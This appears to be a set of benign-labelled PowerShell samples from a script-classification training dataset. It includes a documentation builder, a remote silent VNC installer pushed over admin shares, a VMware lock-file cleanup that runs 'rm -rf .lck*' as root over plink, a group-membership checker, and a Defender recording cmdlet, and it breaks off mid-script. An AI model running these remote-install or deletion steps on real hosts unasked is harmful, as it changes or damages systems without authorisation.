BAGCNxQCBAweCgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMB # Af8wHwYDVR0jBBgwFoAU1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBL # oEmgR4ZFaHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMv # TWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggr # BgEFBQcwAoY+aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNS # b29DZXJBdXRfMjAxMC0wNi0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1Vffwq # reEsH2cBMSRb4Z5yS/ypb+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27 # DzHkwo/7bNGhlBgi7ulmZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pv # vinLbtg/SHUB2RjebYIM9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9Ak # vUCgvxm2EhIRXT0n4ECWOKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWK # NsIdw2FzLixre24/LAl4FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2 # kQH2zsZ0/fZMcm8Qq3UwxTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+ # c23Kjgm9swFXSVRk2XPXfx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep # 8beuyOiJXk+d0tBMdrVXVAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+Dvk # txW/tM4+pTFRhLy/AsGConsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1Zyvg # DbjmjJnW4SLq8CdCPSWU5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/ # 2XBjU02N7oJtpQUQwXEGahC0HVUzWLOhcGbyoYIDVjCCAj4CAQEwggEBoYHZpIHW # MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT # Hm5TaGllbGQgVFNTIEVTTjoyRDFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z # b2Z0IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAoj0WtVVQUNSK # oqtrjinRAsBUdoOggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDANBgkqhkiG9w0BAQsFAAIFAOq6mB8wIhgPMjAyNDEwMTYxOTUzMDNaGA8yMDI0 # MTAxNzE5NTMwM1owdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA6rqYHwIBADAHAgEA # AgITlDAHAgEAAgITuDAKAgUA6rvpnwIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgor # BgEEAYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBCwUA # A4IBAQA53e1ZBcDhDsWZMS3u1aDNSZktow7J70V2Vg8bO0jdCjgWkAmCism+zVfn # XiXxFd2cZwucJXmrYOnMGn8FalFnhy9+azGBhueienNCkAalajbb5B1eOTUpZkc4 # +pZuH9ifH/R8EcBOoqlA+oHjlmnQqm88tvQSBmza2k9tfgZWNO5fnKDW6ROlAn14 # MuMLXh4LgXA2RxFKCQkqW3Tgcs0K8UCLRL1Qc8mFULceZEiJjA4EVX5hUkcNMATi # hOBI84nAr42RP7Ft8zFE3wAF5UlSp58a+qGjPvznoRTNmQOk0Fmv4RY9oYjuXdHE # fElxCE2lDD7qSAKY1YWbUsEy4GBOMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTACEzMAAAH9c/loWs0MYe0AAQAAAf0wDQYJYIZIAWUD # BAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0B # CQQxIgQgwbAvUZRo+8y6OMGlRa5HcXZ4k7fDf8fNRCB89g3TJh8wgfoGCyqGSIb3 # DQEJEAIvMYHqMIHnMIHkMIG9BCCAKEgNyUowvIfx/eDfYSupHkeF1p6GFwjKBs8l # RB4NRzCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u # MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp # b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB # /XP5aFrNDGHtAAEAAAH9MCIEIH02jKHHK0JjcRvZfcGED02NBZ4amv4uk/Jf3Tjd # Z9P3MA0GCSqGSIb3DQEBCwUABIICADBx6uJU1hqh0+t7s5H9voFYLEfCKVrEwtav # A0u8k9p6aoV6778lyc/ahQJF0OQn4103CSZMhOx+hChFMylo33iS+mrDwEr96n+K # aL9ey7AHgg57iFjg8RLBgltdJuWkvSobHbhPL5lA44vghLD/MXeTs+FchaTvVz5D # kHL8VZFUQgZVCaLLuizOriTe4LCKjnJ/VNsQ+EeSk6MBZBwW4KPl5ja8c5iYs+52 # 8cRpPMtZMpZl9TWvej1l3rwMEZ5T/Zi65QRJ47qB1QRLp1ChRoC8WR/Xd9Gb4ggW # mCL6Nh8nZVGNQiGLQpNlMQ2LZBZp2CmTcG561LOVck++DG1kk58X1kwl04KbkmPu # IzjmQJLKmj/aZHfVo+fW1v9pcMZyrB57FKboxu/9TyPpbMmpe/2au/om7/mghF18 # 5ewLOYJaWCRPEhSis23BWM4AW7ryjub+Wc6y9p+mbTlnxFnvK5F3AnkSZO16NjtD # 2rcVs3aCrp09F5XbFaVu95/+QwbS95iaP87zGuWlAROGrDSj1hef71hFGMkmmT81 # I+QjXObS3+0wvbdUUb+Pho+AAUKkbDyQwcbEkZOmf+BU30ihPT3XMnvH97/yCBPg # p2XwUBBRbPm6XQgNwmhGkrcBK58sZB+yqN0I9pwdUlVloyOi4sHx/KeJaiZNWOde # AVVJaUwg # SIG # End signature block
combined_dataset/train/non-malicious/1042.ps1
1042.ps1
[CmdletBinding()] param( [Parameter(Mandatory=$true)] [string] $WebRoot, [Switch] $SkipCommandHelp ) Set-StrictMode -Version 'Latest' function Out-HtmlPage { param( [Parameter(Mandatory=$true,ValueFromPipeline=$true,ValueFromPipelineByPropertyName=$true)] [Alias('Html')] $Content, [Parameter(Mandatory=$true)] $Title, [Parameter(Mandatory=$true)] $VirtualPath ) begin { Set-StrictMode -Version 'Latest' } process { $path = Join-Path -Path $WebRoot -ChildPath $VirtualPath $templateArgs = @( $Title, $Content, (Get-Date).Year ) @' <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>{0}</title> <link href="silk.css" type="text/css" rel="stylesheet" /> <link href="styles.css" type="text/css" rel="stylesheet" /> </head> <body> <ul id="SiteNav"> <li><a href="index.html">Get-Carbon</a></li> <li><a href="about_Carbon_Installation.html">-Install</a></li> <li><a href="documentation.html">-Documentation</a></li> <li><a href="about_Carbon_Support.html">-Support</a></li> <li><a href="releasenotes.html">-ReleaseNotes</a></li> <li><a href="http://pshdo.com">-Blog</a></li> <li><a href="https://github.com/pshdo/Carbon/">-Project</a></li> </ul> {1} <div class="Footer"> Copyright <a href="http://pshdo.com">Aaron Jensen</a> and WebMD Health Services. </div> </body> </html> '@ -f $templateArgs | Set-Content -Path $path } end { } } & (Join-Path -Path $PSScriptRoot -ChildPath '.\Tools\Silk\Import-Silk.ps1' -Resolve) if( (Get-Module -Name 'Blade') ) { Remove-Module 'Blade' } & (Join-Path -Path $PSScriptRoot -ChildPath '.\Carbon\Import-Carbon.ps1' -Resolve) -Force $headingMap = @{ 'NEW DSC RESOURCES' = 'New DSC Resources'; 'ADDED PASSTHRU PARAMETERS' = 'Added PassThru Parameters'; 'SWITCH TO SYSTEM.DIRECTORYSERVICES.ACCOUNTMANAGEMENT API FOR USER/GROUP MANAGEMENT' = 'Switch To System.DirectoryServices.AccountManagement API For User/Group Management'; 'INSTALL FROM ZIP ARCHIVE' = 'Install From ZIP Archive'; 'INSTALL FROM POWERSHELL GALLERY' = 'Install From PowerShell Gallery'; 'INSTALL WITH NUGET' = 'Install With NuGet'; } $moduleInstallPath = Get-PowerShellModuleInstallPath $linkPath = Join-Path -Path $moduleInstallPath -ChildPath 'Carbon' Install-Junction -Link $linkPath -Target (Join-Path -Path $PSScriptRoot -ChildPath 'Carbon') -Verbose:$VerbosePreference try { Convert-ModuleHelpToHtml -ModuleName 'Carbon' -HeadingMap $headingMap -SkipCommandHelp:$SkipCommandHelp -Script 'Import-Carbon.ps1' | ForEach-Object { Out-HtmlPage -Title ('PowerShell - {0} - Carbon' -f $_.Name) -VirtualPath ('{0}.html' -f $_.Name) -Content $_.Html } } finally { Uninstall-Junction -Path $linkPath } New-ModuleHelpIndex -TagsJsonPath (Join-Path -Path $PSScriptRoot -ChildPath 'tags.json') -ModuleName 'Carbon' -Script 'Import-Carbon.ps1' | Out-HtmlPage -Title 'PowerShell - Carbon Module Documentation' -VirtualPath '/documentation.html' $carbonTitle = 'Carbon: PowerShell DevOps module for configuring and setting up Windows computers, applications, and websites' Get-Item -Path (Join-Path -Path $PSScriptRoot -ChildPath 'Carbon\en-US\about_Carbon.help.txt') | Convert-AboutTopicToHtml -ModuleName 'Carbon' -Script 'Import-Carbon.ps1' | ForEach-Object { $_ -replace '<h1>about_Carbon</h1>','<h1>Carbon</h1>' } | Out-HtmlPage -Title $carbonTitle -VirtualPath '/index.html' Get-Content -Path (Join-Path -Path $PSScriptRoot -ChildPath 'RELEASE NOTES.txt') -Raw | Edit-HelpText -ModuleName 'Carbon' | Convert-MarkdownToHtml | Out-HtmlPage -Title ('Release Notes - {0}' -f $carbonTitle) -VirtualPath '/releasenotes.html' Copy-Item -Path (Join-Path -Path $PSScriptRoot -ChildPath 'Tools\Silk\Resources\silk.css' -Resolve) ` -Destination $WebRoot -Verbose
combined_dataset/train/non-malicious/2405.ps1
2405.ps1
function Deploy-Vnc { [CmdletBinding()] param ( [Parameter(Mandatory)] [ValidateNotNullOrEmpty()] [ValidateScript({ Test-Connection -ComputerName $_ -Quiet -Count 1 })] [string]$ComputerName, [Parameter(Mandatory)] [ValidateNotNullOrEmpty()] [ValidateScript({ Test-Path -Path $_ -PathType Container })] [string]$InstallerFolder ) begin { $ErrorActionPreference = 'Stop' } process { try { if (-not (Test-Path -Path "\\$ComputerName\c$")) { throw "The c`$ share is not available on computer [$($ComputerName)]" } else { Write-Verbose -Message "c$ share is available on [$($ComputerName)]" } $installFolderName = $InstallerFolder.Split('\')[-1] if (Test-Path -Path "\\$ComputerName\c$\$installFolderName") { Write-Verbose -Message "VNC install folder already exists at \\$ComputerName\c$\$installFolderName" $sourceHashes = Get-ChildItem -Path $InstallerFolder | foreach { (Get-FileHash -Path $_.FullName).Hash } $destHashes = Get-ChildItem -Path "\\$ComputerName\c$\$installFolderName" | foreach { (Get-FileHash -Path $_.FullName).Hash } if (Compare-Object -ReferenceObject $sourceHashes -DifferenceObject $destHashes) { Write-Verbose -Message 'Remote computer VNC installer contents does not match source. Overwriting...' Copy-Item -Path $InstallerFolder -Destination "\\$ComputerName\c$" -Recurse } else { Write-Verbose -Message 'Remote computer VNC installer contents already exist. No need to copy again.' } } else { Write-Verbose -Message "Copying VNC installer contents to [$($ComputerName)]" Copy-Item -Path $InstallerFolder -Destination "\\$ComputerName\c$" -Recurse } $localInstallFolder = "C:\$installFolderName".TrimEnd('\') $localInstaller = "$localInstallFolder\Setup.exe" $localInfFile = "$localInstallFolder\silentnstall.inf" $scriptBlock = { Start-Process $using:localInstaller -Args "/verysilent /loadinf=`"$using:localInfFile`"" -Wait -NoNewWindow } Write-Verbose -Message 'Running VNC installer...' Invoke-Command -ComputerName $ComputerName -ScriptBlock $scriptBlock } catch { $PSCmdlet.ThrowTerminatingError($_) } finally { $remoteInstallFolder = "\\$ComputerName\c$\$installFolderName" Write-Verbose -Message "Cleaning up VNC install bits at [$($remoteInstallFolder)]" Remove-Item $remoteInstallFolder -Recurse -ErrorAction Ignore } } }
combined_dataset/train/non-malicious/FixInvalidVMs.ps1
FixInvalidVMs.ps1
#====================================================================================== # File Name : FixInvalidVMs.ps1 # Original Author : Kenneth C. Mazie # Description : Resets all "invald" or "inaccessible" virtual machines # : # Notes : Will cycle through an entire Virtual Center instance and # : identify any virtual machines that are "invald" or # : "inaccessible" as a result of a host crash where running # : VMs were left with lock files in place. The script must # : have PUTTY installed and configured. A local status echo # : as well as a date and time stamped log file is written # : in the folder that this script is executed from if the # : options are set below. # Process : VMs that are processed are removed from inventory, then # : the ESX host is connected to and the associated lock files # : are deleted. ONLY files named ".lckxxxxxxx" are deleted, and # : ONLY in the specific folder and datastore that the target # : VM resides in. The VM is then re-registered in Virtual # : Center and moved back into the original folder it came # : from. # : # Testing : The only way I found to simulate invalid VMs is to rename # : the VM folder on the datastore and then restart the ESX host. # : # Warnings : The script connects to an ESX host and performs delete # : operations on hidden lock files. You were warned. # : NOTE: all harmfull operations are commented out by default # : via the "LIVEOPS" variable. This script was written for # : and tested in my environment, yours may require significant # : changes to the script to function properly. # : $LiveOps = $False #--[ Change to $True to enable all destructive operations ]-- # : # Legal : Script provided "AS IS" without warranties or guarantees of any # : kind. USE AT YOUR OWN RISK. Public domain, no rights reserved. # : Please keep this header in tact if at all possible. # : # Credits : Code snippets and/or ideas came from many sources including but # : not limited to the following: # : Kevin Markwardt: http://www.kevinmarkwardt.com/script.php?id=15 # : LucD: http://communities.vmware.com/thread/213290 # : Anders Mikkelsen: http://www.amikkelsen.com/?p=357 # : # Legal : Script provided "AS IS" without warranties or guarantees of any # : kind. USE AT YOUR OWN RISK. Public domain, no rights reserved. # : # Last Update by : Kenneth C. Mazie # Version History : v1.0 - 03-04-11 - Original # Change History : v1.1 - 00-00-00 - # : #======================================================================================= #--[ Clear the screen, disable error notification ]-- Clear-Host $ErrorActionPreference = "SilentlyContinue" #--[ Load the VMWare snapin if not already ]-- $out = Get-PSSnapin | Where-Object {$_.Name -like "vmware.vimautomation.core"} if ($out -eq $null){Add-PSSnapin vmware.vimautomation.core} #--[ Connect to the Virtual Center server ]-- Connect-VIServer -Server <YOUR-VC-SERVER> -User <VC-USER> -Password <PASSWORD> | out-null #--[ Get Current Script Path ]-- $ScriptPath = Split-Path -parent $MyInvocation.MyCommand.Definition #--[ Set status / logging options ]-- $StatEcho = $True #--[ True to echo to screen ]-- $StatLog = $True #--[ True to write a log file ]-- #--[ Get VM Folder Function ]-- filter Get-FolderPath { $_ | Get-View | % { $row = "" | select Name, Path $row.Name = $_.Name $current = Get-View $_.Parent #$path = $_.Name # Uncomment out this line if you do want the VM Name to appear at the end of the path $path = "" do { $parent = $current if($parent.Name -ne "vm"){$path = $parent.Name + "\\" + $path} $current = Get-View $current.Parent } while ($current.Parent -ne $null) $row.Path = $path $row } } function BldPuttyCmd ($x) { #--[ The linked commands that PUTTY executes ]-- #--[ This is called from 2 places. Alter the commands to change what is done by PUTTY ]-- #--[ As written it runs 2 chained Linux commends that will CD into the target VM folder ]-- #--[ and delete higgen lock files. ]-- return "`"cd $x && rm –rf .lck*`"" } #--[ Initialize Variables ]-- $Target = "" $Plink = "`"C:\\Program Files (x86)\\PuTTY\\plink.exe`"" #--[ Complete path to PUTTY ]-- $PuttyUsername = "root" #--[ Set to your ESX host username ]-- $PuttyHostname = "192.168.1.1" #--[ Set to the hostname/Ip of an appropriate ESX host ]-- $PuttyPassword = "PASSWORD" #--[ Set to your ESX host user password ]-- $PuttyLogon = $PuttyUsername +"@"+ $PuttyHostname $PuttyCommand = BldPuttyCmd "<FullPathToVMX>" #--[ Inserts temporary text into the PUTTY command string ]-- #--[ Initailize Status Log ]-- If ($StatEcho -eq $True){ Write-Host "Starting run..." Write-Host "============================================" Write-Host "ESX Logon = $PuttyUsername" Write-Host "ESX Host = $PuttyHostname" Write-Host "Putty executable path = $Plink" Write-Host "Putty command = $PuttyCommand" Write-Host "Script executed from: `"$ScriptPath`"" Write-Host "============================================"} If ($StatLog -eq $True){ $LogFile = $ScriptPath+"\\LogFile-{0:dd-MM-yyyy_HHmm}.log" -f (Get-Date) add-content $LogFile "Starting run..." add-content $LogFile "============================================" add-content $LogFile "ESX Logon = $PuttyUsername" add-content $LogFile "ESX Host = $PuttyHostname" add-content $LogFile "Putty executable path = $Plink" add-content $LogFile "Putty command = $PuttyCommand" Add-Content $LogFile "Script executed from: `"$ScriptPath`"" add-content $LogFile "============================================"} #--[ Do It ]-- $Invalid = Get-View -ViewType VirtualMachine | Where {-not $_.Config.Template} | Where{$_.Runtime.ConnectionState -eq “invalid” -or $_.Runtime.ConnectionState -eq “inaccessible”} | sort Name foreach ($vm in $Invalid){ If ($StatLog -eq $True){add-content $LogFile "--------------------------------------------"} If ($StatEcho -eq $True){Write-Host "--------------------------------------------"} #--[ Gather Target Info ]-- $Target = get-vm $vm.name $TargetDataCenter = Get-Datacenter -VM $Target $TargetView = $Target | Get-View $TargetESXHost = $Target.host.name $TargetCluster = Get-Cluster -VM $Target $Datastores = Get-Datastore | select Name, Id $TargetDatastore = ($Datastores | where {$_.ID -match (($TargetView.Datastore | Select -First 1) | Select Value).Value} | Select Name).Name $TargetVCFolder = ($Target | Get-Folderpath).Path.Split("\\") $VmxFullPath = "/vmfs/volumes/"+$TargetDatastore+"/"+$vm.name+"/" $TargetESX = Get-VMHost $TargetESXhost | Get-View $TargetResourcePool = Get-VMHost $TargetESXHost | Get-ResourcePool | Get-View $TargetFolder = Get-View (Get-Datacenter -Name $TargetDatacenter | Get-Folder -Name "vm").id $vmx = "[$TargetDatastore] "+$Target+"/"+$Target+".vmx" If ($StatEcho -eq $True){ Write-Host "Identified $Target as INVALID or INACCESSIBLE" Write-Host "ESX Host = " $TargetESXhost Write-Host "DataCenter = $TargetDataCenter" Write-Host "Cluster = " $TargetCluster Write-Host "vCenter Folder = " $TargetVCFolder[1] Write-Host "Datastore = "$TargetDatastore Write-Host Full path to virtual disk = $VmxFullPath} If ($StatLog -eq $True){ add-content $LogFile "Identified $Target as INVALID or INACCESSIBLE" add-content $LogFile "ESX Host = $TargetESXhost" add-content $LogFile "DataCenter = $TargetDataCenter" add-content $LogFile "Cluster = $TargetCluster" add-content $LogFile "vCenter Folder = $TargetVCFolder[1]" add-content $LogFile "Datastore = [$TargetDatastore]" Add-Content $LogFile "Full path to virtual disk = $VmxFullPath"} #--[ Remove the VM from inventory ]-- If ($LiveOps -eq $True){ If ($StatEcho -eq $True){write-host "Removing $Target from vCenter inventory..."} If ($StatLog -eq $True){add-content $LogFile "Removing $Target from vCenter inventory..."} Get-vm -Name $Target | remove-vm -Confirm:$false }else{ If ($StatEcho -eq $True){write-host `t"LiveOps disabled: Simulating Removing $Target from vCenter inventory..."} If ($StatLog -eq $True){add-content $LogFile `t"LiveOps disabled: Simulating Removing $Target from vCenter inventory..."} Get-vm -Name $Target | remove-vm -Confirm:$false -WhatIf } #--[ Delete lock files ]-- $PuttyCommand = BldPuttyCmd $VmxFullPath #--[ Regenerate the PUTTY comand line ]-- If ($LiveOps -eq $True){ If ($StatEcho -eq $True){write-host "Invoking PUTTY, Deleting all `".lck`" files in folder..."} If ($StatLog -eq $True){add-content $LogFile "Invoking PUTTY, Deleting all `".lck`" files in folder..."} Start-Process $plink -ArgumentList "$PuttyLogon","-pw $PuttyPassword","$PuttyCommand" | Out-Null }else{ If ($StatEcho -eq $True){write-host `t"LiveOps disabled: " $plink -ArgumentList "$PuttyLogon","-pw $PuttyPassword","$PuttyCommand"} If ($StatLog -eq $True){add-content $LogFile `t"LiveOps disabled: " $plink -ArgumentList "$PuttyLogon","-pw $PuttyPassword","$PuttyCommand"} } #--[ Re-register the target VM ]-- If ($LiveOps -eq $True){ if((Get-VM $Target -ea SilentlyContinue) -eq $null){ #--[ Check if VM is already registered ]-- If ($StatEcho -eq $True){Write-Host "Registering $Target into Virtual Center..."} If ($StatLog -eq $True){add-content $LogFile "Registering $Target into Virtual Center..."} $Task1 = $TargetFolder.RegisterVM_Task($vmx,$Target,$FALSE,$TargetResourcePool.MoRef,$TargetESX.MoRef) #--[ Wait untill VM is registered ]-- $Task2 = Get-View $Task1 while($Task1.info.state -eq "running" -or $Task1.info.state -eq "queued"){ $Task2 = Get-View $Task1 } #--[ Test the return code of the RegisterVM_Task for error state ]-- if($Task1.info.error -eq $null){ #--[ No error ]-- }else{ #--[ error ]-- If ($StatEcho -eq $True){Write-Host "Registration of $Target errored out!!! Something went wrong!!!"} If ($StatLog -eq $True){add-content $LogFile "Registration of $Target errored out!!! Something went wrong!!!"} # break #--[ Optional break ]-- } }else{ If ($StatEcho -eq $True){Write-Host "$Target VM Already Registered!!! Something went wrong!!!"} If ($StatLog -eq $True){add-content $LogFile "$Target VM Already Registered!!! Something went wrong!!!"} # break #--[ Optional break ]-- } }else{ If ($StatEcho -eq $True){ write-host `t"LiveOps disabled: Registration bypassed"} write-host `t"Command line would have been: `"TargetFolder.RegisterVM_Task `" $vmx,$Target,FALSE,$TargetResourcePool.name ,$TargetESX.name" If ($StatLog -eq $True){add-content $LogFile `t"LiveOps disabled: Registration bypassed"} } #--[ Move the VM to the proper folder ]-- If ($LiveOps -eq $True){ If ($StatEcho -eq $True){write-host "Moving $Target back into proper folder..."} If ($StatLog -eq $True){add-content $LogFile "Moving $Target back into proper folder..." } move-vm -VM $(get-vm $Target) -Destination $(Get-Folder -Name $TargetVCFolder[1] -Location $(Get-Datacenter $TargetDataCenter)) }else{ If ($StatEcho -eq $True){write-host "LiveOps disabled: Folder Move bypassed"} If ($StatLog -eq $True){add-content $LogFile "LiveOps disabled: Folder Move bypassed"} move-vm -VM $(get-vm $Target) -Destination $(Get-Folder -Name $TargetVCFolder[1] -Location $(Get-Datacenter $TargetDataCenter)) -WhatIf } #--[ Optional VM Power On ]-- if ((get-vm -name $Target).PowerState -eq "PoweredOff"){ If ($LiveOps -eq $True){ If ($StatEcho -eq $True){Write-Host "Powering on $Target..."} If ($StatLog -eq $True){add-content $LogFile "Powering on $Target..."} Start-VM -VM $Target -Confirm:$false -RunAsync }else{ If ($StatEcho -eq $True){write-host `t"LiveOps disabled: Power On bypassed"} If ($StatLog -eq $True){add-content $LogFile `t"LiveOps disabled: Power On bypassed"} Start-VM -VM $Target -whatif } } } If ($StatLog -eq $True){add-content $LogFile "============================================" add-content $LogFile "Completed..."} If ($StatEcho -eq $True){Write-Host "============================================" write-host "Completed..."} $fullpath = $null
combined_dataset/train/non-malicious/Find Local Group Members_2.ps1
Find Local Group Members_2.ps1
# Author: Hal Rottenberg # Purpose: Find matching members in a local group # Used tip from RichS here: http://powershellcommunity.org/Forums/tabid/54/view/topic/postid/1528/Default.aspx # Change these two to suit your needs $ChildGroups = "Domain Admins", $LocalGroup = "Administrators" $error.clear() $MemberNames = @() # uncomment this line to grab list of computers from a file $Servers = Get-Content serverlist.txt # $Servers = $env:computername # for testing on local computer foreach ( $Server in $Servers ) { $MemberNames = @() $Group= [ADSI]"WinNT://$Server/$LocalGroup,group" $Members = @($Group.psbase.Invoke("Members")) $Members | ForEach-Object { $MemberNames += $_.GetType().InvokeMember("Name", 'GetProperty', $null, $_, $null) } $errCount = $error.count $ChildGroups | ForEach-Object { $output = "" | Select-Object Server, Group, InLocalAdmin $output.Server = $Server $output.Group = $_ If ($errCount -gt 0){$output.InLocalAdmin = "Connection Error!"}ELSE{$output.InLocalAdmin = $MemberNames -contains $_} Write-Output $output } $error.clear() }
combined_dataset/train/non-malicious/sample_49_19.ps1
sample_49_19.ps1
## Copyright (c) Microsoft Corporation. All rights reserved. <# .SYNOPSIS This cmdlet collects a performance recording of Microsoft Defender Antivirus scans. .DESCRIPTION This cmdlet collects a performance recording of Microsoft Defender Antivirus scans. These performance recordings contain Microsoft-Antimalware-Engine and NT kernel process events and can be analyzed after collection using the Get-MpPerformanceReport cmdlet. This cmdlet requires elevated administrator privileges. The performance analyzer provides insight into problematic files that could cause performance degradation of Microsoft Defender Antivirus. This tool is provided "AS IS", and is not intended to provide suggestions on exclusions. Exclusions can reduce the level of protection on your endpoints. Exclusions, if any, should be defined with caution. .EXAMPLE New-MpPerformanceRecording -RecordTo:.\Defender-scans.etl #> function New-MpPerformanceRecording { [CmdletBinding(DefaultParameterSetName='Interactive')] param( # Specifies the location where to save the Microsoft Defender Antivirus # performance recording. [Parameter(Mandatory=$true)] [ValidateNotNullOrEmpty()] [string]$RecordTo, # Specifies the duration of the performance recording in seconds. [Parameter(Mandatory=$true, ParameterSetName='Timed')] [ValidateRange(0,2147483)] [int]$Seconds, # Specifies the PSSession object in which to create and save the Microsoft # Defender Antivirus performance recording. When you use this parameter, # the RecordTo parameter refers to the local path on the remote machine. [Parameter(Mandatory=$false)] [System.Management.Automation.Runspaces.PSSession[]]$Session, # Optional argument to specifiy a different tool for recording traces. Default is wpr.exe # When $Session parameter is used this path represents a location on the remote machine. [Parameter(Mandatory=$false)] [string]$WPRPath = $null ) [bool]$interactiveMode = ($PSCmdlet.ParameterSetName -eq 'Interactive') [bool]$timedMode = ($PSCmdlet.ParameterSetName -eq 'Timed') # Hosts [string]$powerShellHostConsole = 'ConsoleHost' [string]$powerShellHostISE = 'Windows PowerShell ISE Host' [string]$powerShellHostRemote = 'ServerRemoteHost' if ($interactiveMode -and ($Host.Name -notin @($powerShellHostConsole, $powerShellHostISE, $powerShellHostRemote))) { $ex = New-Object System.Management.Automation.ItemNotFoundException 'Cmdlet supported only on local PowerShell console, Windows PowerShell ISE and remote PowerShell console.' $category = [System.Management.Automation.ErrorCategory]::NotImplemented $errRecord = New-Object System.Management.Automation.ErrorRecord $ex,'NotImplemented',$category,$Host.Name $psCmdlet.WriteError($errRecord) return } if ($null -ne $Session) { [int]$RemotedSeconds = if ($timedMode) { $Seconds } else { -1 } Invoke-Command -Session:$session -ArgumentList:@($RecordTo, $RemotedSeconds) -ScriptBlock:{ param( [Parameter(Mandatory=$true)] [ValidateNotNullOrEmpty()] [string]$RecordTo, [Parameter(Mandatory=$true)] [ValidateRange(-1,2147483)] [int]$RemotedSeconds ) if ($RemotedSeconds -eq -1) { New-MpPerformanceRecording -RecordTo:$RecordTo -WPRPath:$WPRPath } else { New-MpPerformanceRecording -RecordTo:$RecordTo -Seconds:$RemotedSeconds -WPRPath:$WPRPath } } return } if (-not (Test-Path -LiteralPath:$RecordTo -IsValid)) { $ex = New-Object System.Management.Automation.ItemNotFoundException "Cannot record Microsoft Defender Antivirus performance recording to path '$RecordTo' because the location does not exist." $category = [System.Management.Automation.ErrorCategory]::InvalidArgument $errRecord = New-Object System.Management.Automation.ErrorRecord $ex,'InvalidPath',$category,$RecordTo $psCmdlet.WriteError($errRecord) return } # Resolve any relative paths $RecordTo = $psCmdlet.SessionState.Path.GetUnresolvedProviderPathFromPSPath($RecordTo) # Dependencies: WPR Profile [string]$wprProfile = "$PSScriptRoot\MSFT_MpPerformanceRecording.wprp" if (-not (Test-Path -LiteralPath:$wprProfile -PathType:Leaf)) { $ex = New-Object System.Management.Automation.ItemNotFoundException "Cannot find dependency file '$wprProfile' because it does not exist." $category = [System.Management.Automation.ErrorCategory]::ObjectNotFound $errRecord = New-Object System.Management.Automation.ErrorRecord $ex,'PathNotFound',$category,$wprProfile $psCmdlet.WriteError($errRecord) return } # Dependencies: WPR Version try { # If user provides a valid string as $WPRPath we go with that. [string]$wprCommand = $WPRPath if (!$wprCommand) { $wprCommand = "wpr.exe" $wprs = @(Get-Command -All "wpr" 2> $null) if ($wprs -and ($wprs.Length -ne 0)) { $latestVersion = [System.Version]"0.0.0.0" $wprs | ForEach-Object { $currentVersion = $_.Version $currentFullPath = $_.Source $currentVersionString = $currentVersion.ToString() Write-Host "Found $currentVersionString at $currentFullPath" if ($currentVersion -gt $latestVersion) { $latestVersion = $currentVersion $wprCommand = $currentFullPath } } } } } catch { # Fallback to the old ways in case we encounter an error (ex: version string format change). [string]$wprCommand = "wpr.exe" } finally { Write-Host "`nUsing $wprCommand version $((Get-Command $wprCommand).FileVersionInfo.FileVersion)`n" } # # Test dependency presence # if (-not (Get-Command $wprCommand -ErrorAction:SilentlyContinue)) { $ex = New-Object System.Management.Automation.ItemNotFoundException "Cannot find dependency command '$wprCommand' because it does not exist." $category = [System.Management.Automation.ErrorCategory]::ObjectNotFound $errRecord = New-Object System.Management.Automation.ErrorRecord $ex,'PathNotFound',$category,$wprCommand $psCmdlet.WriteError($errRecord) return } # Exclude versions that have known bugs or are not supported any more. [int]$wprFileVersion = ((Get-Command $wprCommand).Version.Major) -as [int] if ($wprFileVersion -le 6) { $ex = New-Object System.Management.Automation.PSNotSupportedException "You are using an older and 